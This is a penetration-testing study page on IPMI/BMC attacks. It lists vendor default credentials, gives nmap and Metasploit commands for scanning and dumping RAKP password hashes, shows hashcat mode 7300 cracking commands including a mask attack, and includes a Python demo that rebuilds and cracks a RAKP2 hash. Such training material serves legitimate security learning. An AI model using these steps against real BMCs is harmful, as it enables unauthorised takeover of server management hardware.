# **Basic Information**
According to [HTB Academy](https://academy.hackthebox.com/module/112/section/1245):
> [Intelligent Platform Management Interface](https://www.thomas-krenn.com/en/wiki/IPMI_Basics) (`IPMI`) is a set of standardized specifications for hardware-based host management systems used for system management and monitoring. It acts as an autonomous subsystem and works independently of the host's BIOS, CPU, firmware, and underlying operating system. IPMI provides sysadmins with the ability to manage and monitor systems even if they are powered off or in an unresponsive state. It operates using a direct network connection to the system's hardware and does not require access to the operating system via a login shell. IPMI can also be used for remote upgrades to systems without requiring physical access to the target host. IPMI is typically used in three ways:
> - Before the OS has booted to modify BIOS settings
> - When the host is fully powered down
> - Access to a host after a system failure
>
> IPMI communicates over port 623 UDP. Systems that use the IPMI protocol are called Baseboard Management Controllers (BMCs). BMCs are typically implemented as embedded ARM systems running Linux, and connected directly to the host's motherboard. BMCs are built into many motherboards but can also be added to a system as a PCI card. Most servers either come with a BMC or support adding a BMC. The most common BMCs we often see during internal penetration tests are HP iLO, Dell DRAC, and Supermicro IPMI.
# **Enumeration**
- Attempt to log in with default credentials and/or dump hashes to crack offline
| Product | Username | Password |
| --------------- | ------------- | ------------------------------------------------------------------------- |
| Dell iDRAC | root | calvin |
| HP iLO | Administrator | randomized 8-character string consisting of numbers and uppercase letters |
| Supermicro IPMI | ADMIN | ADMIN |
## **Scanning**
- If IPMI 2.0 is found, attempt to dump the RAKP hashes and crack them offline; the hash leak used below is specific to the IPMI 2.0 RAKP exchange, so a BMC that only speaks IPMI 1.5 does not expose it.
```bash
# default scan: UDP/623, the ipmi-version NSE script reports the supported IPMI version(s)
sudo nmap -sU --script ipmi-version -p 623 <target_ip>
# metasploit scanner (-q: no banner, -n: no database)
msfconsole -qn
use auxiliary/scanner/ipmi/ipmi_version
set RHOSTS <target_ip>
run
```
## **Dump Hashes**
- If default credentials do not work to access a BMC, we can turn to a [flaw](http://fish2.com/ipmi/remote-pw-cracking.html) in the RAKP authentication exchange of IPMI 2.0 (documented by Dan Farmer).
- During session setup (RAKP message 2), the BMC sends the client an HMAC-SHA1 (or HMAC-MD5, depending on the negotiated authentication algorithm) keyed with the user's password and computed over the two session IDs, both random nonces, the BMC GUID, the requested role and the username. It does this before the client has proven knowledge of the password, and every input to the HMAC except the password is known to the client.
- Because the BMC answers this way for any valid username the client supplies, an unauthenticated attacker can obtain a crackable HMAC for ANY valid user account on the BMC simply by opening a session with that username.
- These hashes can then be cracked offline with a dictionary attack using `Hashcat` mode `7300` (IPMI2 RAKP HMAC-SHA1); each hashcat line has the form `<hex of the MAC'd session data>:<hex HMAC>`.
- In the event of an HP iLO using a factory-default password, use a mask attack instead of a wordlist: `hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u` tries all combinations of digits and uppercase letters for an eight-character password (36^8, about 2.8 trillion candidates), which is feasible because HMAC-SHA1 is fast to compute.
```bash
# dump hashes: the module opens a session for each name in USER_FILE and records the RAKP2 response
msfconsole -qn
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS <target_ip>
set OUTPUT_HASHCAT_FILE ipmi.txt
run
# crack hashes offline: a single hash on the command line ...
hashcat -m 7300 -w 3 -O "93c887ae8200000052f17511d0fd3b9a08350b045e118a2cd0c311777576080bc13a5581d522cdb5a123456789abcdefa123456789abcdef140561646d696e:3541221bac8d7e76f34e45697aed40edfbe87fd8" /usr/share/wordlists/rockyou.txt
# ... or the whole dump file written by the module
hashcat -m 7300 -w 3 -O ipmi.txt /usr/share/wordlists/rockyou.txt
```
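The following Python is an added example (not HTB Academy's or Metasploit's code) that shows why the RAKP message 2 response is directly crackable: it rebuilds the BMC-side HMAC from the fields a client already knows, parses the sample `-m 7300` line from this page back into those fields, and runs the same dictionary check hashcat performs. The session IDs, nonces and GUID in `simulate_bmc_response` are constructed stand-ins for values a real client would capture on the wire; the function and constant names are this example's own. It does not talk to a BMC.

```python
"""Why RAKP leaks an offline-crackable hash.

In RAKP Message 2 the BMC returns
    HMAC(K_uid, SIDm || SIDc || RandM || RandC || GUIDc || ROLEm || ULENm || Username)
keyed with the user's password K_uid. Every input except the password is known to
the unauthenticated client, so the response is a ready-made hashcat -m 7300 line.
"""
import hashlib
import hmac

# Field widths (bytes) in the data the BMC authenticates in RAKP Message 2.
SID_M, SID_C, RAND_M, RAND_C, GUID_C = 4, 4, 16, 16, 16

# The sample hash line from this page; its username field decodes to "admin".
SAMPLE_HASHCAT_LINE = (
    "93c887ae8200000052f17511d0fd3b9a08350b045e118a2cd0c311777576080bc13a5581d522cdb5"
    "a123456789abcdefa123456789abcdef140561646d696e"
    ":3541221bac8d7e76f34e45697aed40edfbe87fd8"
)


def rakp2_salt(sid_m, sid_c, rand_m, rand_c, guid_c, role_m, username):
    """Concatenate the RAKP2 fields the BMC MACs (hashcat calls this the salt)."""
    user = username.encode()
    if len(user) > 16:
        raise ValueError("IPMI user names are at most 16 bytes")
    return sid_m + sid_c + rand_m + rand_c + guid_c + bytes([role_m, len(user)]) + user


def rakp2_hmac(password, salt, hash_name="sha1"):
    """BMC-side computation: HMAC over the salt keyed with the raw password bytes."""
    return hmac.new(password.encode(), salt, getattr(hashlib, hash_name)).digest()


def to_hashcat_line(salt, mac):
    """Format one RAKP2 response as hashcat -m 7300 expects: <salt hex>:<hmac hex>."""
    return f"{salt.hex()}:{mac.hex()}"


def rakp2_fields(line):
    """Split a hashcat -m 7300 line back into the RAKP2 fields it encodes."""
    salt_hex, mac_hex = line.strip().split(":")
    salt = bytes.fromhex(salt_hex)
    fields, off = {}, 0
    for name, width in (("sid_m", SID_M), ("sid_c", SID_C), ("rand_m", RAND_M),
                        ("rand_c", RAND_C), ("guid_c", GUID_C)):
        fields[name] = salt[off:off + width]
        off += width
    # ROLEm: low nibble is the privilege level (4 = Administrator), 0x10 = name-only lookup.
    fields["role"], fields["ulen"] = salt[off], salt[off + 1]
    off += 2
    fields["username"] = salt[off:off + fields["ulen"]].decode()
    fields["mac"] = bytes.fromhex(mac_hex)
    # 20-byte MAC -> RAKP-HMAC-SHA1 (hashcat 7300); 16 bytes -> RAKP-HMAC-MD5.
    fields["hash_name"] = "sha1" if len(fields["mac"]) == 20 else "md5"
    return fields


def crack_rakp2_line(line, wordlist):
    """Offline dictionary attack: the same check hashcat -m 7300 performs per candidate."""
    f = rakp2_fields(line)
    salt = bytes.fromhex(line.split(":")[0])
    for cand in wordlist:
        if hmac.compare_digest(rakp2_hmac(cand, salt, f["hash_name"]), f["mac"]):
            return cand
    return None


def simulate_bmc_response(username, password, role_m=0x14):
    """Constructed handshake: fixed session values stand in for a captured RAKP1/RAKP2 pair."""
    salt = rakp2_salt(
        sid_m=b"\xa0\xa1\xa2\xa3",      # constructed remote console session ID
        sid_c=b"\x00\x00\x00\x02",      # constructed BMC session ID
        rand_m=bytes(range(16)),        # constructed console nonce
        rand_c=bytes(range(16, 32)),    # constructed BMC nonce
        guid_c=b"\x11" * 16,            # constructed BMC GUID
        role_m=role_m,
        username=username,
    )
    return to_hashcat_line(salt, rakp2_hmac(password, salt))


if __name__ == "__main__":
    line = simulate_bmc_response("root", "calvin")  # Dell iDRAC default from the table above
    print(line)
    print(crack_rakp2_line(line, ["password", "ADMIN", "calvin"]))
```

The point to take away is that the only secret input is the HMAC key, so each wordlist candidate costs one HMAC-SHA1, and the username, role and nonces recovered by `rakp2_fields` tell you which account a given hashcat line belongs to.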
# **References**
# **Practical Application**
| Platform | Name | Notes |
| -------- | ---- | ----- |
| | | |